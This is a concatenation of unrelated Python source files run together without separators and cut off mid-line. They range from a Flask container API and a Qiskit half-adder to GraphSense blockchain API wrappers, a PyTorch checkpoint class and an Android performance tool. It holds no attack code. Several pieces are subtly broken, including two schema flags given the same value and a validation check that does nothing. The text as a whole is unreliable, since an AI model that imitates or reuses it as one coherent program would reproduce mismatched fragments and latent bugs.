abort_if_container_doesnt_exist(container_id) container = r.hgetall('containers:%s' % container_id) return marshal(container, container_fields) def patch(self, container_id): """Updates information on a single container. 
Currently just status.""" args = self.reqparse.parse_args() if 'status' in args: if args['status'] == STOPPED: stop_container.delay(container_id) r.hset('containers:%s' % container_id, 'status', STOPPING) elif args['status'] == RUNNING: try: start_container(container_id) except APIError as exception: abort(500, message=exception.explanation) container = r.hgetall('containers:%s' % container_id) return marshal(container, container_fields) def delete(self, container_id): """Stops and deletes a single container.""" abort_if_container_doesnt_exist(container_id) remove_container.delay(container_id) return '', 204 # Setup the Api resource routing here api.add_resource(ImageList, '/v1/images', endpoint='images') api.add_resource(ContainerList, '/v1/containers', endpoint='containers') api.add_resource( Container, '/v1/containers/', endpoint='container') @app.route('/v1/check-in', methods=['POST']) def check_in(): """Processes activity reports from the containers.""" active = request.form['active'] container_ip = request.remote_addr container_id = r.get('ips:%s' % container_ip) if container_id is not None: r.hset('containers:%s' % container_id, 'active', active) return '' Mariana02Santos/Python0 d = int(input('Por quantos dias o carro foi alugado? ')) k = float(input('Quantos km foram rodados? ')) v = 60 * d + 0.15 * k print('O valor a ser pago é' , v) #!/usr/bin/env python3 """ Build a half-adder quantum circuit that takes two bits as input, encodes them into qubits, then runs the half-adder circuit calculating the sum and carry qubits, observed over 1000 runs of the experiment . References: - https://en.wikipedia.org/wiki/Adder_(electronics) - https://qiskit.org/textbook/ch-states/atoms-computation.html#4.2-Remembering-how-to-add- """ import qiskit as q def half_adder(bit0: int, bit1: int) -> q.result.counts.Counts: """ >>> half_adder(0, 0) {'00': 1000} >>> half_adder(0, 1) {'01': 1000} >>> half_adder(1, 0) {'01': 1000} >>> half_adder(1, 1) {'10': 1000} """ # Use Aer's qasm_simulator simulator = q.Aer.get_backend("qasm_simulator") qc_ha = q.QuantumCircuit(4, 2) # encode inputs in qubits 0 and 1 if bit0 == 1: qc_ha.x(0) if bit1 == 1: qc_ha.x(1) qc_ha.barrier() # use cnots to write XOR of the inputs on qubit2 qc_ha.cx(0, 2) qc_ha.cx(1, 2) # use ccx / toffoli gate to write AND of the inputs on qubit3 qc_ha.ccx(0, 1, 3) qc_ha.barrier() # extract outputs qc_ha.measure(2, 0) # extract XOR value qc_ha.measure(3, 1) # extract AND value # Execute the circuit on the qasm simulator job = q.execute(qc_ha, simulator, shots=1000) # Return the histogram data of the results of the experiment. 
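# Classically, the same half adder is just XOR for the sum bit and AND for the
# carry bit; a quick cross-check of the doctest expectations above (keys are
# "carry sum", matching the measured classical register order):
def classical_half_adder(bit0: int, bit1: int) -> str:
    """Return the two-bit result as 'carry sum', matching the counts keys."""
    return f"{bit0 & bit1}{bit0 ^ bit1}"

assert classical_half_adder(1, 1) == "10"
assert classical_half_adder(0, 1) == "01"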
return job.result().get_counts(qc_ha) if __name__ == "__main__": counts = half_adder(1, 1) print(f"Half Adder Output Qubit Counts: {counts}") app/src/app/shared/schema.py1-10 import datetime import json import uuid from app.shared.utils import async_call, camel_case, convert_timestamp from app.shared.validation import validate_base64, validate_hash, validate_url, validate_uuid NOT_DEFINED = str(uuid.uuid4()) REQUIRED = 1 INTEGER = 2 STRING = 4 BOOLEAN = 8 UUID = 16 EXPIRE = 32 BASE64 = 64 DEVICE_TOKEN = PLATFORM = 256 TIMESTAMP = 512 HASH = 1024 URL = 2048 class InputValues: def __init__(self, data=None): if not data: data = {} self._data = data def __str__(self): return str(self._data) def __repr__(self): return str(self._data) def __getitem__(self, key): return self._data.get(key) def __getattr__(self, key): return self._data.get(key) def __contains__(self, item): return self._data.__contains__(item) def __eq__(self, other): if isinstance(other, InputValues): return self._data == other._data elif isinstance(other, dict): return self._data == other else: return False def update(self, *args, **kwargs): return self._data.update(*args, **kwargs) def keys(self): return self._data.keys() def get(self, key, default=None): return self._data.get(key, default) class Schema: def __init__(self, **kwargs): schema_map = {} key_map = {} for k, v in kwargs.items(): schema_map[k] = v key_map[k.lower().replace('_', '')] = k self.schema_map = schema_map self.key_map = key_map async def load(self, input_data): values = InputValues() try: if input_data and isinstance(input_data, bytes): input_data = input_data.decode('utf-8') if input_data and isinstance(input_data, str): try: input_data = json.loads(input_data) except Exception: values.update(error='Invalid JSON') return values if input_data and not isinstance(input_data, dict): values.update(error='Invalid input data') return values except Exception: values.update(error='Invalid input data') return values mapped_values = {} if input_data: for key, value in input_data.items(): if key.lower() in self.key_map: key = self.key_map[key.lower()] if key not in self.schema_map: values.update(error=f'Unknown input: {key}') return values mapped_values[key] = value for key, definition in self.schema_map.items(): default = None if isinstance(definition, tuple): definition, default = definition value = mapped_values.get(key, NOT_DEFINED) external_key = camel_case(key) if definition & REQUIRED == REQUIRED and value in (NOT_DEFINED, None, '', [], {}): values.update(error=f'Missing required input: {external_key}') return values if value in (NOT_DEFINED, None, '', [], {}): if callable(default): value = await async_call(default()) else: value = default if definition & TIMESTAMP == TIMESTAMP and value is not None: ts = convert_timestamp(str(value)) if not ts or ts > datetime.datetime.utcnow() + datetime.timedelta(seconds=60): values.update(error=f'Invalid timestamp value: {external_key}') return values value = ts if definition & HASH == HASH and value is not None: value = str(value).lower() if not validate_hash(value): values.update(error=f'Invalid SHA3-256 hashed value: {external_key}') return values if definition & UUID == UUID and value is not None: value = str(value).lower() if not validate_uuid(value): values.update(error=f'Invalid UUID value: {external_key}') return values if definition & INTEGER == INTEGER and value is not None: try: value = int(value) except Exception: values.update(error=f'Invalid integer value: {external_key}') return values if definition & BOOLEAN 
== BOOLEAN and value is not True and value is not False: try: value = bool(int(value)) except Exception: values.update(error=f'Invalid boolean value: {external_key}') return values if definition & URL == URL and value: if not validate_url(str(value).lower()): values.update(error=f'Invalid url value: {external_key}') return values if definition & PLATFORM == PLATFORM and value: value = str(value).lower() if str(value).lower() not in ('apns', 'fcm'): values.update(error=f'Invalid platform value: {external_key}') return values if definition & DEVICE_TOKEN == DEVICE_TOKEN and value: value = str(value) if not str: # not implemented values.update(error=f'Invalid device token value: {external_key}') return values if definition & EXPIRE == EXPIRE and value is not None: try: value = int(value) if value < 30 or value > 300: raise Exception('Invalid value') except Exception: values.update(error=f'Invalid expire value: {external_key}') return values if definition & BASE64 == BASE64 and value is not None: try: if not validate_base64(str(value).encode('utf-8')): raise Exception('Invalid value') except Exception: values.update(error=f'Invalid base64 encoded value: {external_key}') return values values.update(**{key: value}) return values import os from conans.model.options import OptionsValues from conans.model.profile import Profile from conans.util.files import save def create_profile(folder, name, settings=None, package_settings=None, env=None, package_env=None, options=None): package_env = package_env or {} profile = Profile() profile.settings = settings or {} if package_settings: profile.package_settings = package_settings if options: profile.options = OptionsValues(options) for package_name, envs in package_env.items(): for var_name, value in envs: profile.env_values.add(var_name, value, package_name) for var_name, value in env or {}: profile.env_values.add(var_name, value) save(os.path.join(folder, name), profile.dumps()) from random import randint from core.nlp.response_generator.product.base.base_response_generator import BaseResponseGenerator class BfAttentionResponseGenerator(BaseResponseGenerator): """ This class deals with messages that mean user wants to get bf's attention """ def __call__(self): responses = self.__create_response_for_cant_get_attention_from_bf() self.set_regular_response(responses) return self.response_data @classmethod def __create_response_for_cant_get_attention_from_bf(cls): qr = cls.__create_qr_response() cmp_list = cls.__create_cmp_response() guess_list = cls.__create_guess_response() random_idx_for_cmp_list = randint(0, len(cmp_list) - 1) random_idx_for_guess_list = randint(0, len(guess_list) - 1) return qr + cmp_list[random_idx_for_cmp_list] + guess_list[ random_idx_for_guess_list] @classmethod def __create_qr_response(cls): qr_list = [ ["i am sorry to hear that"], ["omg.."], ["im sorry"], ["jeez.."], ["okay"] ] random_idx_for_qr_list = randint(0, len(qr_list) - 1) qr = qr_list[random_idx_for_qr_list] return qr @classmethod def __create_cmp_response(cls): adj_hard_list = ["difficult", "hard", "tough", "painful", "rough"] random_idx_for_adj_hard = randint(0, len(adj_hard_list) - 1) adj_hard = adj_hard_list[random_idx_for_adj_hard] cmp_list = [ ["i know waiting til he answers is so " + adj_hard + "😢"], ["its just so " + adj_hard + " to wait til he comes back to you right😓"], ["sounds " + adj_hard + " time for you til he will reach out to you😥"], ["i know its " + adj_hard + " that he doesnt pay attention to you😞"] ] return cmp_list @classmethod def 
__create_guess_response(cls): emotion_adj_list = ["anxious", "stressed", "uneasy", "insecure", "worried"] emotion_noun_list = ["anxiety", "stress", "uneasiness", "insecurity", "worry"] random_idx_for_emotion_adj = randint(0, len(emotion_adj_list) - 1) random_idx_for_emotion_noun = randint(0, len(emotion_noun_list) - 1) emotion_adj = emotion_adj_list[random_idx_for_emotion_adj] emotion_noun = emotion_noun_list[random_idx_for_emotion_noun] guess_list = [ ["it can give you major " + emotion_noun], ["it could make you feel like " + emotion_adj], ["you could feel like " + emotion_adj], ["could give you little " + emotion_noun] ] return guess_list import logging import random import numpy as np import pandas as pd import torch import torch.distributed as dist class CheckpointIO: """CheckpointIO class. It handles saving and loading checkpoints. """ def __init__(self, checkpoints_dir, model, optimizer, batch_sampler, metrics_names, num_checkpoints=1, remark=None): """ Args: checkpoint_dir (Path obj): path where checkpoints are saved model: model optimizer: optimizer batch_sampler: batch_sampler metrics_names: metrics names to be saved in a checkpoints csv file num_checkpoints: maximum number of checkpoints to save. When it exceeds the number, the older (older, smaller or higher) checkpoints will be deleted remark (optional): to remark the name of the checkpoint """ self.checkpoints_dir = checkpoints_dir self.checkpoints_dir.mkdir(parents=True, exist_ok=True) self.model = model self.optimizer = optimizer self.batch_sampler = batch_sampler self.num_checkpoints = num_checkpoints self.remark = remark self.value_list = [] self.epoch_list = [] self.checkpoints_csv_path = checkpoints_dir.joinpath('metrics_statistics.csv') # save checkpoints_csv header if dist.get_rank() == 0: metrics_keys_list = [name for name in metrics_names] header = ['epoch'] + metrics_keys_list df_header = pd.DataFrame(columns=header) df_header.to_csv(self.checkpoints_csv_path, sep='\t', index=False, mode='a+') def save(self, epoch, it, metrics, key_rank=None, rank_order='high', max_epoch=100): """Save model. It will save a latest model, a best model of rank_order for value, and 'self.num_checkpoints' best models of rank_order for value. 
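        (Note: as written below, only the metrics csv row and the '{remark}_epoch_latest.pth'
        checkpoint are saved unconditionally; the top-'num_checkpoints' and best-model
        bookkeeping further down is currently commented out.)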
Args: metrics: metrics to log key_rank (str): the key of metrics to rank rank_order: 'low' | 'high' | 'latest' 'low' to keep the models of lowest values 'high' to keep the models of highest values 'latest' to keep the models of latest epochs """ ## save checkpionts_csv metrics_values_list = [value for value in metrics.values()] checkpoint_list = [[epoch] + metrics_values_list] df_checkpoint = pd.DataFrame(checkpoint_list) df_checkpoint.to_csv(self.checkpoints_csv_path, sep='\t', header=False, index=False, mode='a+') ## save checkpoints current_value = None if rank_order == 'latest' else metrics[key_rank] # latest model latest_checkpoint_path = self.checkpoints_dir.joinpath('{}_epoch_latest.pth'.format(self.remark)) self.save_file(latest_checkpoint_path, epoch, it) # save 5 latest models # if epoch >= max_epoch - 5: # checkpoint_path = self.checkpoints_dir.joinpath('{}_epoch_{}th.pth'.format(self.remark, epoch)) # self.save_file(checkpoint_path, epoch, it) # if len(self.value_list) < self.num_checkpoints: # self.value_list.append(current_value) # self.epoch_list.append(epoch) # checkpoint_path = self.checkpoints_dir.joinpath('{}_epoch_{}.pth'.format(self.remark, epoch)) # self.save_file(checkpoint_path, epoch, it) # logging.info('Checkpoint saved to {}'.format(checkpoint_path)) # elif len(self.value_list) >= self.num_checkpoints: # value_list = np.array(self.value_list) # if rank_order == 'high' and current_value >= value_list.min(): # worst_index = value_list.argmin() # self.del_and_save(worst_index, current_value, epoch, it) # elif rank_order == 'low' and current_value <= value_list.max(): # worst_index = value_list.argmax() # self.del_and_save(worst_index, current_value, epoch, it) # elif rank_order == 'latest': # worst_index = 0 # self.del_and_save(worst_index, current_value, epoch, it) # best model # value_list = np.array(self.value_list) # best_checkpoint_path = self.checkpoints_dir.joinpath('{}_epoch_best.pth'.format(self.remark)) # if rank_order == 'high' and current_value >= value_list.max(): # self.save_file(best_checkpoint_path, epoch, it) # elif rank_order == 'low' and current_value <= value_list.min(): # self.save_file(best_checkpoint_path, epoch, it) # elif rank_order == 'latest': # self.save_file(best_checkpoint_path, epoch, it) def del_and_save(self, worst_index, current_value, epoch, it): """Delete and save checkpoint Args: worst_index: worst index, current_value: current value, epoch: epoch, it: it, """ worst_chpt_path = self.checkpoints_dir.joinpath('{}_epoch_{}.pth'.format(self.remark, self.epoch_list[worst_index])) if worst_chpt_path.is_file(): worst_chpt_path.unlink() self.value_list.pop(worst_index) self.epoch_list.pop(worst_index) self.value_list.append(current_value) self.epoch_list.append(epoch) checkpoint_path = self.checkpoints_dir.joinpath('{}_epoch_{}.pth'.format(self.remark, epoch)) self.save_file(checkpoint_path, epoch, it) logging.info('Checkpoint saved to {}'.format(checkpoint_path)) def save_file(self, checkpoint_path, epoch, it): """Save a module to a file Args: checkpoint_path (Path obj): checkpoint path, including .pth file name epoch: epoch, it: it """ outdict = { 'epoch': epoch, 'it': it, 'model': self.model.module.state_dict(), 'optimizer': self.optimizer.state_dict(), 'sampler': self.batch_sampler.get_state(), 'rng': torch.get_rng_state(), 'cuda_rng': torch.cuda.get_rng_state(), 'random': random.getstate(), 'np_random': np.random.get_state(), } torch.save(outdict, checkpoint_path) def load(self, checkpoint_path): """Load a module from a file """ 
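        # Restores everything written by save_file(): model weights (accessed through
        # model.module, i.e. a DataParallel/DistributedDataParallel-style wrapper is
        # expected), optimizer state, the batch sampler position, and the torch / CUDA /
        # python / numpy RNG states, so a resumed run continues from the same point in
        # the data and random streams.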
state_dict = torch.load(checkpoint_path, map_location=torch.device('cpu')) epoch = state_dict['epoch'] it = state_dict['it'] self.model.module.load_state_dict(state_dict['model']) self.optimizer.load_state_dict(state_dict['optimizer']) self.batch_sampler.set_state(state_dict['sampler']) torch.set_rng_state(state_dict['rng']) torch.cuda.set_rng_state(state_dict['cuda_rng']) random.setstate(state_dict['random']) np.random.set_state(state_dict['np_random']) logging.info('Resuming complete from {}\n'.format(checkpoint_path)) return epoch, it ############################################################################### # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. ############################################################################### import os import tensorflow as _tf from distutils.version import StrictVersion is_tf2 = StrictVersion(_tf.__version__.split('-')[0]) >= StrictVersion('2.0.0') def normalize_tensor_shape(tensor_shape): if is_tf2: return [d for d in tensor_shape] else: return [d.value for d in tensor_shape] def dump_graph_into_tensorboard(tf_graph): # type: (_tf.Graph) -> None _tb_log_dir = os.environ.get('TB_LOG_DIR') if _tb_log_dir: if is_tf2: from tensorflow.python.ops.summary_ops_v2 import graph as write_graph pb_visual_writer = _tf.summary.create_file_writer(_tb_log_dir) with pb_visual_writer.as_default(): write_graph(tf_graph) else: from tensorflow.python.summary import summary pb_visual_writer = summary.FileWriter(_tb_log_dir) pb_visual_writer.add_graph(tf_graph) if is_tf2: tensorflow = _tf.compat.v1 def is_subclassed(layer): """Returns True if the object is a subclassed layer or subclassed model.""" return (layer.__module__.find('keras.engine') == -1 and layer.__module__.find('keras.layers') == -1) else: tensorflow = _tf def is_subclassed(layer): return False altescy/xsklearn from pathlib import Path XSKLEARN_ROOT = Path.home() / ".xsklearn" # cache settings CACHE_DIRRECTORY = XSKLEARN_ROOT / "cache" src/api_calls.py0 import requests import json from config import API_TOKEN # ask Matteo to get one api_path = 'https://api.graphsense.info/' headers = {'Accept': 'application/json', 'Authorization': API_TOKEN} def url2dict(url): # print(url) for i in range(4): # allow some failures r = requests.get(url, headers=headers) d = json.loads(r.text) if 'message' not in d: return d return d ############################## # API CALLS # **** WARNING ****: # Most of these calls are not up-to-date with the latest API and fail # I'm slowly updating them. 
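# url2dict() above simply retries the GET up to four times and treats a JSON body with a
# top-level 'message' key as an API error. A variant with a small pause between attempts
# might look like this (illustrative sketch, not part of the original module; it reuses
# the api_path/headers defined above):
import time

def url2dict_with_backoff(url, retries=4, delay=1.0):
    d = {}
    for attempt in range(retries):
        r = requests.get(url, headers=headers)
        d = json.loads(r.text)
        if 'message' not in d:              # no error message -> usable response
            return d
        time.sleep(delay * (attempt + 1))   # back off a little more on each retry
    return d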
# Look at https://api.graphsense.info/ to see current API docs
##############################

def get_label(label):
    url = api_path + '/labelsearch?q=' + label
    return url2dict(url)

def get_address_info(address, currency='btc'):
    url = api_path + currency + '/' + 'addresses/' + address
    return url2dict(url)

def get_address_entityID(address, currency='btc'):
    address = str(address)
    url = api_path + currency + '/' + 'addresses/' + address + '/entity'
    d = url2dict(url)
    if d and 'entity' in d:
        entityID = d['entity']
        return entityID
    return None

def get_address_tags(address, currency='btc'):
    address = str(address)
    url = api_path + currency + '/' + 'addresses/' + address + '/tags'
    d = url2dict(url)
    if d:
        tags = list(set([el['label'] for el in d]))
        return tags
    return []

def get_address_tag(address, currency='btc'):
    tag = 'unknown'
    tags = get_address_tags(address, currency=currency)
    if tags:
        tag = tags[0]
    return tag

def get_address_txs(address, currency='btc', page_size=10000):
    url = api_path + currency + '/' + 'addresses/' + address + '/txs?pagesize=' + str(page_size)
    d = url2dict(url)
    try:
        return d['address_txs']
    except:
        print('fail', d)

def get_address_txs_out(address, currency='btc'):
    txs = get_address_txs(address, currency=currency)
    tx_hashes_out = set()
    for tx in txs:
        if tx['value']['value'] < 0:
            tx_hashes_out.add(tx['tx_hash'])
    return tx_hashes_out

def get_address_txs_in(address, currency='btc'):
    # was a second copy named get_address_txs_out; renamed so this positive-value
    # (incoming) variant matches the get_address_txs_in() calls further below
    txs = get_address_txs(address, currency=currency)
    tx_hashes_in = set()
    for tx in txs:
        if tx['value']['value'] > 0:
            tx_hashes_in.add(tx['tx_hash'])
    return tx_hashes_in

def get_address_neighbors_out(address, currency='btc', limit=0):
    # get all addresses receiving money from this address which means:
    # scan all edges and if source==address, select the target
    address = str(address)
    if not limit:
        limit = get_address_n_transactions_out(address, currency=currency)
    if not limit:
        return set()
    url = api_path + currency + '/' + 'address/' + address + '/neighbors?direction=out&limit=' + str(limit)
    d = url2dict(url)
    neighbors_out = set()
    if d:
        for e in d['edges']:
            if e['source'] == address:
                neighbors_out.add(e['target'])
    return neighbors_out

def get_address_neighbors_in(address, currency='btc', limit=0):
    # get all addresses sending money to this address which means:
    # scan all edges and if target==address, select the source
    address = str(address)
    if not limit:
        limit = get_address_n_transactions_in(address, currency=currency)
    if not limit:
        return set()
    url = api_path + currency + '/' + 'address/' + address + '/neighbors?direction=in&limit=' + str(limit)
    d = url2dict(url)
    neighbors_in = set()
    if d:
        for e in d['edges']:
            if e['target'] == address:
                neighbors_in.add(e['source'])
    return neighbors_in

def get_address_neighbors(address, currency='btc', limit=0):
    limit = int(limit/2)  # because we do a union later
    neighbors_in = get_address_neighbors_in(address, currency=currency, limit=limit)
    neighbors_out = get_address_neighbors_out(address, currency=currency, limit=limit)
    return neighbors_out.union(neighbors_in)

def get_address_money_in(address, currency='btc', coin='satoshi'):
    money = 0
    info = get_address_info(address, currency=currency)
    if 'total_received' in info.keys():
        money = info['total_received'][coin]
    return money

def get_address_money_out(address, currency='btc', coin='satoshi'):
    money = 0
    info = get_address_info(address, currency=currency)
    if 'total_spent' in info.keys():
        money = info['total_spent'][coin]
    return money

def get_address_n_transactions(address, currency='btc'): return
get_address_n_transactions_out(address, currency=currency) + get_address_n_transactions_in(address, currency=currency) def get_address_n_transactions_out(address, currency='btc'): n = 0 info = get_address_info(address, currency=currency) if 'no_outgoing_txs' in info.keys(): n = info['no_outgoing_txs'] return n def get_address_n_transactions_in(address, currency='btc'): n = 0 info = get_address_info(address, currency=currency) if 'no_incoming_txs' in info.keys(): n = info['no_incoming_txs'] return n def get_address_balance(address, currency='btc', coin='eur'): balance = 0 info = get_address_info(address, currency=currency) if info: balance = info['balance'][coin] return balance def get_address_received(address, currency='btc', coin='eur'): received = 0 info = get_address_info(address, currency=currency) if info: received = info['total_received'][coin] return received def get_entity_info(entity, currency='btc'): url = api_path + currency + '/' + 'entities/' + str(entity) return url2dict(url) def get_entity_addresses(entity, currency='btc', page_size=10000): url = api_path + currency + '/' + 'entities/' + str(entity) + '/addresses?pagesize=' + str(page_size) res = url2dict(url) if 'addresses' in res: return [el['address'] for el in res['addresses']] else: return res def get_entity_tags(entity, currency='btc'): url = api_path + currency + '/' + 'entities/' + str(entity) + '/tags' d = url2dict(url) if d: tags = list(set([el['label'] for el in d])) return tags return ['Unknown'] def get_entity_tag(entity, currency='btc'): tag = 'Unknown' tags = get_entity_tags(entity, currency=currency) if tags: tag = tags[0] return tag def get_entity_n_neighbors_out(entity, currency='btc'): n = 0 info = get_entity_info(entity, currency=currency) if 'out_degree' in info.keys(): n = info['out_degree'] return n def get_entity_n_neighbors_in(entity, currency='btc'): n = 0 info = get_entity_info(entity, currency=currency) if 'in_degree' in info.keys(): n = info['in_degree'] return n def get_entity_neighbors_out(entity, currency='btc', limit=0): # get all entities receiving money from this entity which means: # scan all edges and if source==entity, select the target neighbors_out = set() if not limit: limit = get_entity_n_transactions_out(entity, currency=currency) if not limit: return neighbors_out url = api_path + currency + '/' + 'entities/' + str(entity) + '/neighbors?direction=out&limit=' + str(limit) d = url2dict(url) if d: for e in d['edges']: if e['source'] == entity: neighbors_out.add(e['target']) return neighbors_out def get_entity_neighbors_in(entity, currency='btc', limit=0): # get all entities sending money to this entity which means: # scan all edges and if target==entity, select the source neighbors_in = set() if not limit: limit = get_entity_n_transactions_out(entity, currency=currency) if not limit: return neighbors_in url = api_path + currency + '/' + 'entities/' + str(entity) + '/neighbors?direction=in&limit=' + str(limit) d = url2dict(url) neighbors_in = set() if d: for e in d['edges']: if e['target'] == entity: neighbors_in.add(e['source']) return neighbors_in def get_entity_neighbors(entity, currency='btc', limit=0): limit = int(limit/2) neighbors_in = get_entity_neighbors_in(entity, currency=currency, limit=limit) neighbors_out = get_entity_neighbors_out(entity, currency=currency, limit=limit) return neighbors_out.union(neighbors_in) def get_entity_n_transactions(entity, currency='btc'): return get_entity_n_transactions_out(entity, currency=currency) + get_entity_n_transactions_out(entity) def 
get_entity_n_transactions_out(entity, currency='btc'): n = 0 info = get_entity_info(entity, currency=currency) if 'no_outgoing_txs' in info.keys(): n = info['no_outgoing_txs'] return n def get_entity_n_transactions_in(entity, currency='btc'): n = 0 info = get_entity_info(entity, currency=currency) if 'no_incoming_txs' in info.keys(): n = info['no_incoming_txs'] return n def get_entity_balance(entity, currency='btc', coin='eur'): balance = 0 info = get_entity_info(entity, currency=currency) if info: balance = info['balance'][coin] return balance def get_entity_received(entity, currency='btc', coin='eur'): received = 0 info = get_entity_info(entity, currency=currency) if info: received = info['total_received'][coin] return received def get_entity_n_addresses(entity, currency='btc'): n_addresses = 0 info = get_entity_info(entity, currency=currency) if info: n_addresses = info['no_addresses'] return n_addresses def get_entity_txs_timestamps(entity, currency='btc'): # returns a list of transaction timestamps for a entity (or address) tss = [] # get all entity addresses txs addresses = get_entity_addresses(entity , currency=currency, limit=get_entity_info(entity, currency=currency)['no_addresses']) # for each address get txs_ts and append them for address in addresses: txs = get_address_txs(address, currency=currency, limit=get_address_n_transactions(address, currency=currency)+1) tmp = [el['timestamp'] for el in txs] for t in tmp: tss.append(t) return tss # TODO: # def get_entity_n_neighbors_in() # def get_entity_n_neighbors_out() # def get_entity_n_neighbors() # def get_entity_txs() # def get_entity_txs_out() # def get_entity_txs_in() def get_tx(tx_hash, currency='btc'): url = api_path + currency + '/' + 'txs/' + tx_hash return url2dict(url) def get_tx_addresses_in(tx_hash, currency='btc'): tx = get_tx(tx_hash, currency=currency) if 'inputs' in tx: return [el['address'] for el in tx['inputs']] return [] def get_tx_addresses_out(tx_hash, currency='btc'): tx = get_tx(tx_hash, currency=currency) addresses_out = [el['address'] for el in tx['outputs']] return addresses_out def get_tx_entity_in(tx_hash, currency='btc'): address_in = get_tx_addresses_in(tx_hash, currency=currency) if address_in: return get_address_entityID(address_in[0], currency=currency) return -1 def get_tx_entities_out(tx_hash, currency='btc'): entities_out = [get_address_entityID(addr, currency=currency) for addr in get_tx_addresses_out(tx_hash, currency=currency)] return entities_out def get_tx_tags_in(tx_hash, currency='btc'): tags_in = [get_address_tag(addr, currency=currency) for addr in get_tx_addresses_in(tx_hash, currency=currency)] return tags_in def get_tx_tags_out(tx_hash, currency='btc'): tags_out = [get_address_tag(addr, currency=currency) for addr in get_tx_addresses_out(tx_hash, currency=currency)] return tags_out def get_tx_values_out(tx_hash, currency='btc', coin='eur'): return [el['value'][coin] for el in get_tx(tx_hash, currency=currency)['outputs']] def get_tx_values_in(tx_hash, currency='btc', coin='eur'): return [el['value'][coin] for el in get_tx(tx_hash, currency=currency)['inputs']] def get_addresses_txs(addresses, currency='btc', direction='both'): addresses_txs = dict() # key: address, value: list of txs ln = len(addresses) addresses = list(addresses) addresses.sort() for i, addr in enumerate(addresses): print(ln, i, addr, end='\r') if direction == 'in': addresses_txs[addr] = [get_tx(hsh, currency=currency) for hsh in get_address_txs_in(addr, currency=currency)] if direction == 'out': 
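            # as in the 'in' branch above: one get_tx() request per hash, so busy addresses mean many round trips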
addresses_txs[addr] = [get_tx(hsh, currency=currency) for hsh in get_address_txs_out(addr, currency=currency)] if direction == 'both': addresses_txs[addr] = [get_tx(hsh, currency=currency) for hsh in get_address_txs(addr, currency=currency)] return addresses_txs def get_block_hash(height, currency='btc'): url = api_path + currency + '/' + 'block/' + str(height) return url2dict(url)['block_hash'] def get_block_n_txs(height, currency='btc'): url = api_path + currency + '/' + 'block/' + str(height) return url2dict(url)['no_txs'] 0 import random import copy # Consider using the modules imported above. class Hat: def __init__(self, **kwargs): self.contents = self.create_contents(kwargs) def create_contents(self, obj): contents = [] for k, v in obj.items(): n = v while n > 0: contents.append(k) n -= 1 return contents def draw(self, n): if n >= len(self.contents): return self.contents removed = [] for x in range(n): random_ball = random.choice(self.contents) self.contents.remove(random_ball) removed.append(random_ball) return removed def experiment(hat, expected_balls, num_balls_drawn, num_experiments): successfull_experiments = 0 for x in range(num_experiments): is_successfull = True testing_hat = copy.deepcopy(hat) balls_drawn_list = testing_hat.draw(num_balls_drawn) balls_drawn_dict = dict() for ball in balls_drawn_list: balls_drawn_dict[ball] = balls_drawn_dict.get(ball, 0) + 1 for color in expected_balls.keys(): if color not in balls_drawn_dict: is_successfull = False elif balls_drawn_dict[color] < expected_balls[color]: is_successfull = False if is_successfull is True: successfull_experiments += 1 return successfull_experiments / num_experiments1-10 import setuptools with open("README.md", "r") as fh: long_description = fh.read() setuptools.setup( name = 'sb2l', packages=setuptools.find_packages(), version = '0.1.3', license='MIT', description = 'sb2l Translates the biological models written in SBML into LaTeX code to be compiled and read by human eye', long_description=long_description, long_description_content_type="text/markdown", author = ', ', author_email = '', url = 'https://github.com/X-Jiang-bioe/sb2l', download_url = 'https://github.com/X-Jiang-bioe/sb2l/archive/v_0.1.3.tar.gz', package_data={ '': ['*.rtf'], # to include yarosh files }, keywords = ['SBML', 'LaTeX', 'Converter'], install_requires=[ 'pylatex', 'python-libsbml', ], python_requires='>=3', classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Science/Research', 'Topic :: Software Development :: Build Tools', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', ], ) import torch as th def smallest_positive(inputs, dim): """ Args inputs: 3d array [B,T,L]. dim: dimension on which the largest tj lower than t is evaluated. 
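        (Non-positive entries are shifted above the global maximum before the minimum is
        taken, so whenever a strictly positive entry exists along `dim`, the returned
        minimum and index refer to that entry.)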
Return (delta_t, idx_delta_t), is_candidate: delta_t: t - tj, where th is the largest value lower than t idx_delta_t: position of the largest tj lower than t is_candidate: mask to remove padded points """ non_positives = inputs <= 0 # [B,T,L] non_positives = non_positives.float() # [B,T,L] min_inputs, max_inputs = th.min(inputs), th.max(inputs) # 1,1 shift_matrix = (max_inputs - min_inputs) * non_positives * 2 # [B,T,L] shifted_matrix = inputs + shift_matrix # [B,T,L] is_candidate = inputs > 0 # [B,T,L] is_candidate = th.sum(is_candidate, dim=2) # [B,T] is_candidate = (is_candidate > 0).type(inputs.dtype) # [B,T] result = th.min(shifted_matrix, dim=dim) # [B,T] return result, is_candidate # [B,T], [B,T] # recursively import every submodule at runtime # source: https://stackoverflow.com/questions/3365740/how-to-import-all-submodules import pkgutil __all__ = [] for loader, module_name, is_pkg in pkgutil.walk_packages(__path__): __all__.append(module_name) _module = loader.find_module(module_name).load_module(module_name) globals()[module_name] = _module import os from andperf._config import AndPerfConfig from andperf._util import open_with_webbrowser, sh from andperf.gfxinfo import Gfxinfo from andperf.meminfo import Meminfo from andperf.stat_thread import StatThread class AndPerf: def __init__(self): self._config = AndPerfConfig() def _get_app(self, app: str) -> str: return self._config.get('app', app) ################################ # Config ################################ def config(self, **kargs): """ 添加默认配置 Parameters: - app: 默认的perf app,不用每次指定app参数 """ self._config.update(**kargs) def dump_config(self): """ dump 当前的配置 """ self._config.dump() ################################ # Meminfo ################################ def meminfo(self, *, app: str = None): """ 查看app当前的meminfo 信息 """ return Meminfo.dump(self._get_app(app)).meminfo def meminfo_pie(self, *, app: str = None): """ 将app的当前内存占用以饼图的形式展示出来 """ Meminfo.dump(self._get_app(app)).pie() def meminfo_trend(self, period: int = 1, app: str = None): """ App 内存占用趋势图 Parameters: - period: 每次采样的间隔,采样周期 - app: app package name """ Meminfo.trend(self._get_app(app), period) ################################ # Cpu Info ################################ def cpuinfo(self): """ 查看当前的cpu信息 """ print(sh("adb shell dumpsys cpuinfo")) def stat_thread(self, *, interval: int = 10, app: str = None): """ 统计一段时间内App内各个线程cpu时间片占比 Paramters: - interval: 统计间隔 """ StatThread(self._get_app(app)).stat_t(interval) ################################ # Gfx Info ################################ def gfx_reset(self, *, app: str = None): app = self._get_app(app) Gfxinfo.reset(app) print('reset done!') def gfxinfo(self, *, app: 